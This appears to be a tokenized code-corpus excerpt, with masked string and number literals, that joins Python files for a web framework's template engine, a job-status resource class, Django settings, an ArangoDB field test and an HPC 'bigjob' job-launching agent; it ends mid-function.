codebuffer = [ ] <EOL> multiline = dedent = oneline = False <EOL> template = self . source or open ( self . filename , '<STR_LIT:rb>' ) . read ( ) <EOL> def yield_tokens ( line ) : <EOL> for i , part in enumerate ( re . split ( r'<STR_LIT>' , line ) ) : <EOL> if i % <NUM_LIT:2> : <EOL> if part . startswith ( '<STR_LIT:!>' ) : yield '<STR_LIT>' , part [ <NUM_LIT:1> : ] <EOL> else : yield '<STR_LIT>' , part <EOL> else : yield '<STR_LIT>' , part <EOL> def flush ( ) : <EOL> if not ptrbuffer : return <EOL> cline = '<STR_LIT>' <EOL> for line in ptrbuffer : <EOL> for token , value in line : <EOL> if token == '<STR_LIT>' : cline += repr ( value ) <EOL> elif token == '<STR_LIT>' : cline += '<STR_LIT>' % value <EOL> elif token == '<STR_LIT>' : cline += '<STR_LIT>' % value <EOL> cline += '<STR_LIT:U+002CU+0020>' <EOL> cline = cline [ : - <NUM_LIT:2> ] + '<STR_LIT>' <EOL> cline = cline [ : - <NUM_LIT:2> ] <EOL> if cline [ : - <NUM_LIT:1> ] . endswith ( '<STR_LIT>' ) : <EOL> cline = cline [ : - <NUM_LIT:7> ] + cline [ - <NUM_LIT:1> ] <EOL> cline = '<STR_LIT>' + cline + '<STR_LIT>' <EOL> del ptrbuffer [ : ] <EOL> code ( cline ) <EOL> def code ( stmt ) : <EOL> for line in stmt . splitlines ( ) : <EOL> codebuffer . append ( '<STR_LIT:U+0020>' * len ( stack ) + line . strip ( ) ) <EOL> for line in template . splitlines ( True ) : <EOL> lineno += <NUM_LIT:1> <EOL> line = touni ( line , self . encoding ) <EOL> sline = line . lstrip ( ) <EOL> if lineno <= <NUM_LIT:2> : <EOL> m = re . match ( r"<STR_LIT>" , sline ) <EOL> if m : self . encoding = m . group ( <NUM_LIT:1> ) <EOL> if m : line = line . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if sline and sline [ <NUM_LIT:0> ] == '<STR_LIT:%>' and sline [ : <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> line = line . split ( '<STR_LIT:%>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] . lstrip ( ) <EOL> cline = self . split_comment ( line ) . strip ( ) <EOL> cmd = re . split ( r'<STR_LIT>' , cline ) [ <NUM_LIT:0> ] <EOL> flush ( ) <EOL> if cmd in self . blocks or multiline : <EOL> cmd = multiline or cmd <EOL> dedent = cmd in self . dedent_blocks <EOL> if dedent and not oneline and not multiline : <EOL> cmd = stack . pop ( ) <EOL> code ( line ) <EOL> oneline = not cline . endswith ( '<STR_LIT::>' ) <EOL> multiline = cmd if cline . endswith ( '<STR_LIT:\\>' ) else False <EOL> if not oneline and not multiline : <EOL> stack . append ( cmd ) <EOL> elif cmd == '<STR_LIT:end>' and stack : <EOL> code ( '<STR_LIT>' % ( stack . pop ( ) , line . strip ( ) [ <NUM_LIT:3> : ] ) ) <EOL> elif cmd == '<STR_LIT>' : <EOL> p = cline . split ( None , <NUM_LIT:2> ) [ <NUM_LIT:1> : ] <EOL> if len ( p ) == <NUM_LIT:2> : <EOL> code ( "<STR_LIT>" % ( repr ( p [ <NUM_LIT:0> ] ) , p [ <NUM_LIT:1> ] ) ) <EOL> elif p : <EOL> code ( "<STR_LIT>" % repr ( p [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> code ( "<STR_LIT>" ) <EOL> elif cmd == '<STR_LIT>' : <EOL> p = cline . split ( None , <NUM_LIT:2> ) [ <NUM_LIT:1> : ] <EOL> if len ( p ) == <NUM_LIT:2> : <EOL> code ( "<STR_LIT>" % ( repr ( p [ <NUM_LIT:0> ] ) , p [ <NUM_LIT:1> ] ) ) <EOL> elif p : <EOL> code ( "<STR_LIT>" % repr ( p [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> code ( line ) <EOL> else : <EOL> if line . strip ( ) . startswith ( '<STR_LIT>' ) : <EOL> line = line . replace ( '<STR_LIT>' , '<STR_LIT:%>' , <NUM_LIT:1> ) <EOL> ptrbuffer . append ( yield_tokens ( line ) ) <EOL> flush ( ) <EOL> return '<STR_LIT:\n>' . join ( codebuffer ) + '<STR_LIT:\n>' <EOL> def subtemplate ( self , _name , _stdout , * args , ** kwargs ) : <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> if _name not in self . cache : <EOL> self . cache [ _name ] = self . __class__ ( name = _name , lookup = self . lookup ) <EOL> return self . cache [ _name ] . execute ( _stdout , kwargs ) <EOL> def execute ( self , _stdout , * args , ** kwargs ) : <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> env = self . defaults . copy ( ) <EOL> env . update ( { '<STR_LIT>' : _stdout , '<STR_LIT>' : _stdout . extend , <EOL> '<STR_LIT>' : self . subtemplate , '<STR_LIT>' : self . _str , <EOL> '<STR_LIT>' : self . _escape , '<STR_LIT>' : env . get , <EOL> '<STR_LIT>' : env . setdefault , '<STR_LIT>' : env . __contains__ } ) <EOL> env . update ( kwargs ) <EOL> eval ( self . co , env ) <EOL> if '<STR_LIT>' in env : <EOL> subtpl , rargs = env [ '<STR_LIT>' ] <EOL> rargs [ '<STR_LIT>' ] = _stdout [ : ] <EOL> del _stdout [ : ] <EOL> return self . subtemplate ( subtpl , _stdout , rargs ) <EOL> return env <EOL> def render ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> stdout = [ ] <EOL> self . execute ( stdout , kwargs ) <EOL> return '<STR_LIT>' . join ( stdout ) <EOL> def template ( * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> tpl = args [ <NUM_LIT:0> ] if args else None <EOL> template_adapter = kwargs . pop ( '<STR_LIT>' , SimpleTemplate ) <EOL> if tpl not in TEMPLATES or DEBUG : <EOL> settings = kwargs . pop ( '<STR_LIT>' , { } ) <EOL> lookup = kwargs . pop ( '<STR_LIT>' , TEMPLATE_PATH ) <EOL> if isinstance ( tpl , template_adapter ) : <EOL> TEMPLATES [ tpl ] = tpl <EOL> if settings : TEMPLATES [ tpl ] . prepare ( ** settings ) <EOL> elif "<STR_LIT:\n>" in tpl or "<STR_LIT:{>" in tpl or "<STR_LIT:%>" in tpl or '<STR_LIT:$>' in tpl : <EOL> TEMPLATES [ tpl ] = template_adapter ( source = tpl , lookup = lookup , ** settings ) <EOL> else : <EOL> TEMPLATES [ tpl ] = template_adapter ( name = tpl , lookup = lookup , ** settings ) <EOL> if not TEMPLATES [ tpl ] : <EOL> abort ( <NUM_LIT> , '<STR_LIT>' % tpl ) <EOL> for dictarg in args [ <NUM_LIT:1> : ] : kwargs . update ( dictarg ) <EOL> return TEMPLATES [ tpl ] . render ( kwargs ) <EOL> mako_template = functools . partial ( template , template_adapter = MakoTemplate ) <EOL> cheetah_template = functools . partial ( template , template_adapter = CheetahTemplate ) <EOL> jinja2_template = functools . partial ( template , template_adapter = Jinja2Template ) <EOL> simpletal_template = functools . partial ( template , template_adapter = SimpleTALTemplate ) <EOL> def view ( tpl_name , ** defaults ) : <EOL> '''<STR_LIT>''' <EOL> def decorator ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> result = func ( * args , ** kwargs ) <EOL> if isinstance ( result , ( dict , DictMixin ) ) : <EOL> tplvars = defaults . copy ( ) <EOL> tplvars . update ( result ) <EOL> return template ( tpl_name , ** tplvars ) <EOL> return result <EOL> return wrapper <EOL> return decorator <EOL> mako_view = functools . partial ( view , template_adapter = MakoTemplate ) <EOL> cheetah_view = functools . partial ( view , template_adapter = CheetahTemplate ) <EOL> jinja2_view = functools . partial ( view , template_adapter = Jinja2Template ) <EOL> simpletal_view = functools . partial ( view , template_adapter = SimpleTALTemplate ) <EOL> TEMPLATE_PATH = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> TEMPLATES = { } <EOL> DEBUG = False <EOL> NORUN = False <EOL> HTTP_CODES = httplib . responses <EOL> HTTP_CODES [ <NUM_LIT> ] = "<STR_LIT>" <EOL> HTTP_CODES [ <NUM_LIT> ] = "<STR_LIT>" <EOL> HTTP_CODES [ <NUM_LIT> ] = "<STR_LIT>" <EOL> HTTP_CODES [ <NUM_LIT> ] = "<STR_LIT>" <EOL> HTTP_CODES [ <NUM_LIT> ] = "<STR_LIT>" <EOL> _HTTP_STATUS_LINES = dict ( ( k , '<STR_LIT>' % ( k , v ) ) for ( k , v ) in HTTP_CODES . items ( ) ) <EOL> ERROR_PAGE_TEMPLATE = """<STR_LIT>""" % __name__ <EOL> request = LocalRequest ( ) <EOL> response = LocalResponse ( ) <EOL> local = threading . local ( ) <EOL> app = default_app = AppStack ( ) <EOL> app . push ( ) <EOL> ext = _ImportRedirect ( __name__ + '<STR_LIT>' , '<STR_LIT>' ) . module <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> opt , args , parser = _cmd_options , _cmd_args , _cmd_parser <EOL> if opt . version : <EOL> _stdout ( '<STR_LIT>' % __version__ ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> if not args : <EOL> parser . print_help ( ) <EOL> _stderr ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT:.>' ) <EOL> sys . modules . setdefault ( '<STR_LIT>' , sys . modules [ '<STR_LIT:__main__>' ] ) <EOL> host , port = ( opt . bind or '<STR_LIT:localhost>' ) , <NUM_LIT> <EOL> if '<STR_LIT::>' in host : <EOL> host , port = host . rsplit ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> run ( args [ <NUM_LIT:0> ] , host = host , port = port , server = opt . server , <EOL> reloader = opt . reload , plugins = opt . plugin , debug = opt . debug ) </s>
<s> """<STR_LIT>""" <EOL> import contextlib <EOL> import datetime <EOL> import os <EOL> import shutil <EOL> import time <EOL> class Resource : <EOL> """<STR_LIT>""" <EOL> _STATE_UPDATE_INTERVAL = datetime . timedelta ( seconds = <NUM_LIT:0.5> ) <EOL> def __init__ ( self , id , conn ) : <EOL> """<STR_LIT>""" <EOL> self . _id = id <EOL> self . _conn = conn <EOL> self . _last_updated = datetime . datetime . min <EOL> @ property <EOL> def id ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _id <EOL> def is_pending ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _pending <EOL> def is_running ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _running <EOL> def has_finished ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _finished <EOL> def has_succeeded ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _finished <EOL> def has_failed ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _failed <EOL> def get_error ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _error <EOL> def _update_state_if_needed ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _state_should_be_updated ( ) : <EOL> self . _update_state ( ) <EOL> def _state_should_be_updated ( self ) : <EOL> """<STR_LIT>""" <EOL> now = datetime . datetime . now ( ) <EOL> return ( now - self . _last_updated ) > self . _STATE_UPDATE_INTERVAL <EOL> def _wait_until_state_can_be_updated ( self ) : <EOL> """<STR_LIT>""" <EOL> time . sleep ( self . _STATE_UPDATE_INTERVAL . total_seconds ( ) ) <EOL> def _update_state ( self ) : <EOL> """<STR_LIT>""" <EOL> status = self . _get_status ( ) <EOL> self . _pending = status [ '<STR_LIT>' ] <EOL> self . _running = status [ '<STR_LIT>' ] <EOL> self . _finished = status [ '<STR_LIT>' ] <EOL> self . _succeeded = status [ '<STR_LIT>' ] <EOL> self . _failed = status [ '<STR_LIT>' ] <EOL> self . _error = status [ '<STR_LIT:error>' ] <EOL> self . _last_updated = datetime . datetime . now ( ) <EOL> return status <EOL> def _get_status ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _conn . send_get_request ( '<STR_LIT>' . format ( self . id ) ) <EOL> def _handle_failure ( self , on_failure , error ) : <EOL> """<STR_LIT>""" <EOL> if on_failure is not None : <EOL> obj = on_failure ( error ) <EOL> if isinstance ( obj , Exception ) : <EOL> raise obj <EOL> def _get_file_contents ( self , file_path , is_text_file ) : <EOL> """<STR_LIT>""" <EOL> with contextlib . closing ( self . _conn . get_file ( file_path ) ) as file : <EOL> contents = file . read ( ) <EOL> if is_text_file : <EOL> contents = contents . decode ( ) <EOL> return contents <EOL> def _get_file_and_save_it_to ( self , file_path , directory = None ) : <EOL> """<STR_LIT>""" <EOL> directory = directory or os . getcwd ( ) <EOL> with contextlib . closing ( self . _conn . get_file ( file_path ) ) as src : <EOL> dst_path = os . path . join ( directory , src . name ) <EOL> with open ( dst_path , '<STR_LIT:wb>' ) as dst : <EOL> shutil . copyfileobj ( src , dst ) <EOL> return dst_path </s>
<s> DEBUG = True <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> ALLOWED_HOSTS = [ ] <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SITE_ID = <NUM_LIT:1> <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) </s>
<s> import unittest <EOL> from arangodb . orm . fields import BooleanField <EOL> class BooleanFieldTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_basic_creation_with_default ( self ) : <EOL> boolean = False <EOL> field = BooleanField ( default = boolean ) <EOL> self . assertEqual ( boolean , field . boolean ) <EOL> def test_equals ( self ) : <EOL> boolean1 = BooleanField ( ) <EOL> boolean1 . set ( True ) <EOL> boolean2 = BooleanField ( ) <EOL> boolean2 . set ( True ) <EOL> self . assertEqual ( boolean1 , boolean2 ) <EOL> boolean1 = BooleanField ( ) <EOL> boolean1 . set ( False ) <EOL> boolean2 = BooleanField ( ) <EOL> boolean2 . set ( False ) <EOL> self . assertEqual ( boolean1 , boolean2 ) <EOL> def test_equal_with_wrong_class ( self ) : <EOL> boolean1 = BooleanField ( ) <EOL> boolean1 . set ( False ) <EOL> self . assertTrue ( not ( boolean1 == False ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> import bigjob . state <EOL> import socket <EOL> import threading <EOL> import time <EOL> import pdb <EOL> import traceback <EOL> import ConfigParser <EOL> import types <EOL> import logging <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> try : <EOL> import saga <EOL> except : <EOL> logging . warning ( "<STR_LIT>" ) <EOL> sys . path . append ( os . path . dirname ( os . path . abspath ( __file__ ) ) + "<STR_LIT>" ) <EOL> logging . debug ( str ( sys . path ) ) <EOL> from threadpool import * <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:5> ) : <EOL> sys . path . append ( os . path . dirname ( __file__ ) + "<STR_LIT>" ) <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:4> ) : <EOL> sys . path . append ( os . path . dirname ( __file__ ) + "<STR_LIT>" ) <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:3> ) : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> import subprocess <EOL> """<STR_LIT>""" <EOL> CONFIG_FILE = "<STR_LIT>" <EOL> THREAD_POOL_SIZE = <NUM_LIT:4> <EOL> APPLICATION_NAME = "<STR_LIT>" <EOL> class bigjob_agent : <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , args ) : <EOL> self . coordination_url = args [ <NUM_LIT:1> ] <EOL> self . jobs = [ ] <EOL> self . processes = { } <EOL> self . freenodes = [ ] <EOL> self . busynodes = [ ] <EOL> self . restarted = { } <EOL> conf_file = os . path . dirname ( os . path . abspath ( __file__ ) ) + "<STR_LIT>" + CONFIG_FILE <EOL> config = ConfigParser . ConfigParser ( ) <EOL> logging . debug ( "<STR_LIT>" + conf_file ) <EOL> config . read ( conf_file ) <EOL> default_dict = config . defaults ( ) <EOL> self . CPR = default_dict [ "<STR_LIT>" ] <EOL> self . SHELL = default_dict [ "<STR_LIT>" ] <EOL> self . MPIRUN = default_dict [ "<STR_LIT>" ] <EOL> logging . debug ( "<STR_LIT>" + self . CPR + "<STR_LIT>" + self . MPIRUN + "<STR_LIT>" + self . SHELL ) <EOL> self . init_rms ( ) <EOL> self . failed_polls = <NUM_LIT:0> <EOL> self . base_url = args [ <NUM_LIT:2> ] <EOL> logging . debug ( "<STR_LIT>" + str ( args ) ) <EOL> logging . debug ( "<STR_LIT>" + self . base_url ) <EOL> if ( self . coordination_url . startswith ( "<STR_LIT>" ) ) : <EOL> try : <EOL> from coordination . bigjob_coordination_advert import bigjob_coordination <EOL> logging . debug ( "<STR_LIT>" + self . coordination_url ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> elif ( self . coordination_url . startswith ( "<STR_LIT>" ) ) : <EOL> try : <EOL> from coordination . bigjob_coordination_redis import bigjob_coordination <EOL> logging . debug ( "<STR_LIT>" + self . coordination_url + "<STR_LIT:.>" ) <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> elif ( self . coordination_url . startswith ( "<STR_LIT>" ) ) : <EOL> try : <EOL> from coordination . bigjob_coordination_zmq import bigjob_coordination <EOL> logging . debug ( "<STR_LIT>" ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" <EOL> + "<STR_LIT>" ) <EOL> self . coordination = bigjob_coordination ( server_connect_url = self . coordination_url ) <EOL> self . coordination . set_pilot_state ( self . base_url , str ( bigjob . state . Running ) , False ) <EOL> self . resource_lock = threading . RLock ( ) <EOL> self . threadpool = ThreadPool ( THREAD_POOL_SIZE ) <EOL> self . launcher_thread = threading . Thread ( target = self . dequeue_new_jobs ) <EOL> self . launcher_thread . start ( ) <EOL> self . monitoring_thread = threading . Thread ( target = self . start_background_thread ) <EOL> self . monitoring_thread . start ( ) <EOL> def init_rms ( self ) : <EOL> if ( os . environ . get ( "<STR_LIT>" ) != None ) : <EOL> return self . init_pbs ( ) <EOL> elif ( os . environ . get ( "<STR_LIT>" ) != None ) : <EOL> return self . init_sge ( ) <EOL> else : <EOL> return self . init_local ( ) <EOL> return None <EOL> def init_local ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> num_cpus = self . get_num_cpus ( ) <EOL> for i in range ( <NUM_LIT:0> , num_cpus ) : <EOL> self . freenodes . append ( "<STR_LIT>" ) <EOL> except IOError : <EOL> self . freenodes = [ "<STR_LIT>" ] <EOL> def init_sge ( self ) : <EOL> """<STR_LIT>""" <EOL> sge_node_file = os . environ . get ( "<STR_LIT>" ) <EOL> if sge_node_file == None : <EOL> return <EOL> f = open ( sge_node_file ) <EOL> sgenodes = f . readlines ( ) <EOL> f . close ( ) <EOL> for i in sgenodes : <EOL> columns = i . split ( ) <EOL> try : <EOL> for j in range ( <NUM_LIT:0> , int ( columns [ <NUM_LIT:1> ] ) ) : <EOL> logging . debug ( "<STR_LIT>" + columns [ <NUM_LIT:0> ] . strip ( ) ) <EOL> self . freenodes . append ( columns [ <NUM_LIT:0> ] + "<STR_LIT:\n>" ) <EOL> except : <EOL> pass <EOL> return self . freenodes <EOL> def init_pbs ( self ) : <EOL> """<STR_LIT>""" <EOL> pbs_node_file = os . environ . get ( "<STR_LIT>" ) <EOL> if pbs_node_file == None : <EOL> return <EOL> f = open ( pbs_node_file ) <EOL> self . freenodes = f . readlines ( ) <EOL> f . close ( ) <EOL> num_cpus = self . get_num_cpus ( ) <EOL> node_dict = { } <EOL> for i in set ( self . freenodes ) : <EOL> node_dict [ i ] = self . freenodes . count ( i ) <EOL> if node_dict [ i ] < num_cpus : <EOL> node_dict [ i ] = num_cpus <EOL> self . freenodes = [ ] <EOL> for i in node_dict . keys ( ) : <EOL> logging . debug ( "<STR_LIT>" + i + "<STR_LIT>" + str ( node_dict [ i ] ) ) <EOL> for j in range ( <NUM_LIT:0> , node_dict [ i ] ) : <EOL> logging . debug ( "<STR_LIT>" + i . strip ( ) ) <EOL> self . freenodes . append ( i ) <EOL> def get_num_cpus ( self ) : <EOL> cpuinfo = open ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> cpus = cpuinfo . readlines ( ) <EOL> cpuinfo . close ( ) <EOL> num = <NUM_LIT:0> <EOL> for i in cpus : <EOL> if i . startswith ( "<STR_LIT>" ) : <EOL> num = num + <NUM_LIT:1> <EOL> return num <EOL> def execute_job ( self , job_url , job_dict ) : <EOL> """<STR_LIT>""" <EOL> state = str ( job_dict [ "<STR_LIT:state>" ] ) <EOL> if ( state == str ( bigjob . state . Unknown ) or <EOL> state == str ( bigjob . state . New ) ) : <EOL> try : <EOL> logging . debug ( "<STR_LIT>" + str ( job_dict ) ) <EOL> numberofprocesses = "<STR_LIT:1>" <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> numberofprocesses = job_dict [ "<STR_LIT>" ] <EOL> spmdvariation = "<STR_LIT>" <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> spmdvariation = job_dict [ "<STR_LIT>" ] <EOL> arguments = "<STR_LIT>" <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> arguments_raw = job_dict [ '<STR_LIT>' ] ; <EOL> if type ( arguments_raw ) == types . ListType : <EOL> arguments_list = arguments_raw <EOL> else : <EOL> arguments_list = eval ( job_dict [ "<STR_LIT>" ] ) <EOL> for i in arguments_list : <EOL> arguments = arguments + "<STR_LIT:U+0020>" + i <EOL> workingdirectory = os . getcwd ( ) <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> workingdirectory = job_dict [ "<STR_LIT>" ] <EOL> environment = os . environ <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> for i in job_dict [ "<STR_LIT>" ] : <EOL> env = i . split ( "<STR_LIT:=>" ) <EOL> environment [ env [ <NUM_LIT:0> ] ] = env [ <NUM_LIT:1> ] + "<STR_LIT::>" + environment [ env [ <NUM_LIT:0> ] ] <EOL> environment [ "<STR_LIT>" ] = workingdirectory + "<STR_LIT::>" + environment [ "<STR_LIT>" ] <EOL> print "<STR_LIT>" , environment [ "<STR_LIT>" ] <EOL> executable = job_dict [ "<STR_LIT>" ] <EOL> output = "<STR_LIT>" <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> output = job_dict [ "<STR_LIT>" ] <EOL> error = "<STR_LIT>" <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> error = job_dict [ "<STR_LIT>" ] <EOL> self . jobs . append ( job_url ) <EOL> output_file = os . path . join ( workingdirectory , output ) <EOL> error_file = os . path . join ( workingdirectory , error ) <EOL> logging . debug ( "<STR_LIT>" + output_file + "<STR_LIT>" + error_file + "<STR_LIT>" + str ( environment ) ) <EOL> stdout = open ( output_file , "<STR_LIT:w>" ) <EOL> stderr = open ( error_file , "<STR_LIT:w>" ) <EOL> command = executable + "<STR_LIT:U+0020>" + arguments <EOL> machinefile = self . allocate_nodes ( job_dict ) <EOL> host = "<STR_LIT:localhost>" <EOL> try : <EOL> machine_file_handler = open ( machinefile , "<STR_LIT:r>" ) <EOL> node = machine_file_handler . readlines ( ) <EOL> machine_file_handler . close ( ) <EOL> host = node [ <NUM_LIT:0> ] . strip ( ) <EOL> except : <EOL> pass <EOL> if ( machinefile == None ) : <EOL> logging . debug ( "<STR_LIT>" + job_url ) <EOL> self . coordination . queue_job ( self . base_url , job_url ) <EOL> return <EOL> if ( spmdvariation . lower ( ) == "<STR_LIT>" ) : <EOL> command = "<STR_LIT>" + workingdirectory + "<STR_LIT>" + self . MPIRUN + "<STR_LIT>" + numberofprocesses + "<STR_LIT>" + machinefile + "<STR_LIT:U+0020>" + command <EOL> else : <EOL> command = "<STR_LIT>" + executable + "<STR_LIT>" + workingdirectory + "<STR_LIT:;>" + command <EOL> shell = self . SHELL <EOL> logging . debug ( "<STR_LIT>" + command + "<STR_LIT>" + workingdirectory + "<STR_LIT>" + str ( socket . gethostname ( ) ) + "<STR_LIT>" + shell + "<STR_LIT:)>" ) <EOL> p = subprocess . Popen ( args = command , executable = shell , stderr = stderr , <EOL> stdout = stdout , cwd = workingdirectory , <EOL> env = environment , shell = True ) <EOL> logging . debug ( "<STR_LIT>" + command ) <EOL> dirlist = os . listdir ( workingdirectory ) <EOL> print dirlist <EOL> os . system ( "<STR_LIT>" ) <EOL> self . processes [ job_url ] = p <EOL> self . coordination . set_job_state ( job_url , str ( bigjob . state . Running ) ) <EOL> except : <EOL> traceback . print_exc ( file = sys . stderr ) <EOL> def allocate_nodes ( self , job_dict ) : <EOL> """<STR_LIT>""" <EOL> self . resource_lock . acquire ( ) <EOL> number_nodes = int ( job_dict [ "<STR_LIT>" ] ) <EOL> nodes = [ ] <EOL> machine_file_name = None <EOL> if ( len ( self . freenodes ) >= number_nodes ) : <EOL> unique_nodes = set ( self . freenodes ) <EOL> for i in unique_nodes : <EOL> number = self . freenodes . count ( i ) <EOL> logging . debug ( "<STR_LIT>" + i + "<STR_LIT>" + str ( number ) <EOL> + "<STR_LIT>" + str ( self . busynodes ) <EOL> + "<STR_LIT>" + str ( self . freenodes ) ) <EOL> for j in range ( <NUM_LIT:0> , number ) : <EOL> if ( number_nodes > <NUM_LIT:0> ) : <EOL> nodes . append ( i ) <EOL> self . freenodes . remove ( i ) <EOL> self . busynodes . append ( i ) <EOL> number_nodes = number_nodes - <NUM_LIT:1> <EOL> else : <EOL> break <EOL> machine_file_name = self . get_machine_file_name ( job_dict ) <EOL> machine_file = open ( machine_file_name , "<STR_LIT:w>" ) <EOL> machine_file . writelines ( nodes ) <EOL> machine_file . close ( ) <EOL> logging . debug ( "<STR_LIT>" + machine_file_name + "<STR_LIT>" + str ( nodes ) ) <EOL> self . resource_lock . release ( ) <EOL> return machine_file_name <EOL> def setup_charmpp_nodefile ( self , allocated_nodes ) : <EOL> """<STR_LIT>""" <EOL> nodefile_string = "<STR_LIT>" <EOL> for i in allocated_nodes : <EOL> if i . has_key ( "<STR_LIT>" ) : <EOL> nodefile_string = nodefile_string + "<STR_LIT>" + i [ "<STR_LIT>" ] + "<STR_LIT>" + str ( i [ "<STR_LIT>" ] ) + "<STR_LIT>" <EOL> else : <EOL> nodefile_string = nodefile_string + "<STR_LIT>" + i [ "<STR_LIT>" ] + "<STR_LIT>" + str ( i [ "<STR_LIT>" ] ) + "<STR_LIT>" <EOL> jd = saga . job . description ( ) <EOL> jd . executable = "<STR_LIT>" <EOL> jd . number_of_processes = "<STR_LIT:1>" <EOL> jd . spmd_variation = "<STR_LIT>" <EOL> jd . arguments = [ "<STR_LIT>" + nodefile_string + "<STR_LIT>" , "<STR_LIT:>>" , "<STR_LIT>" ] <EOL> jd . output = "<STR_LIT>" <EOL> jd . error = "<STR_LIT>" <EOL> job_service_url = saga . url ( "<STR_LIT>" + allocated_nodes [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> job_service = saga . job . service ( self . session , job_service_url ) <EOL> job = job_service . create_job ( jd ) <EOL> job . run ( ) <EOL> job . wait ( ) <EOL> def print_machine_file ( self , filename ) : <EOL> fh = open ( filename , "<STR_LIT:r>" ) <EOL> lines = fh . readlines ( ) <EOL> fh . close <EOL> logging . debug ( "<STR_LIT>" + filename + "<STR_LIT>" + str ( lines ) ) <EOL> def free_nodes ( self , job_url ) : <EOL> job_dict = self . coordination . get_job ( job_url ) <EOL> self . resource_lock . acquire ( ) <EOL> number_nodes = int ( job_dict [ "<STR_LIT>" ] ) <EOL> machine_file_name = self . get_machine_file_name ( job_dict ) <EOL> logging . debug ( "<STR_LIT>" + machine_file_name ) <EOL> allocated_nodes = [ "<STR_LIT>" ] <EOL> try : <EOL> machine_file = open ( machine_file_name , "<STR_LIT:r>" ) <EOL> allocated_nodes = machine_file . readlines ( ) <EOL> machine_file . close ( ) <EOL> except : <EOL> traceback . print_exc ( file = sys . stderr ) <EOL> logging . debug ( "<STR_LIT>" + str ( allocated_nodes ) ) <EOL> for i in allocated_nodes : <EOL> logging . debug ( "<STR_LIT>" + str ( i ) + "<STR_LIT>" + str ( self . busynodes ) <EOL> + "<STR_LIT>" + str ( self . freenodes ) ) <EOL> self . busynodes . remove ( i ) <EOL> self . freenodes . append ( i ) <EOL> logging . debug ( "<STR_LIT>" + machine_file_name ) <EOL> if os . path . exists ( machine_file_name ) : <EOL> os . remove ( machine_file_name ) <EOL> self . resource_lock . release ( ) <EOL> def get_machine_file_name ( self , job_dict ) : <EOL> """<STR_LIT>""" <EOL> job_id = job_dict [ "<STR_LIT>" ] <EOL> homedir = os . path . expanduser ( '<STR_LIT>' ) <EOL> return homedir + "<STR_LIT>" + job_id <EOL> def dequeue_new_jobs ( self ) : <EOL> """<STR_LIT>""" <EOL> job_counter = <NUM_LIT:0> <EOL> while self . is_stopped ( self . base_url ) == False : <EOL> if len ( self . freenodes ) == 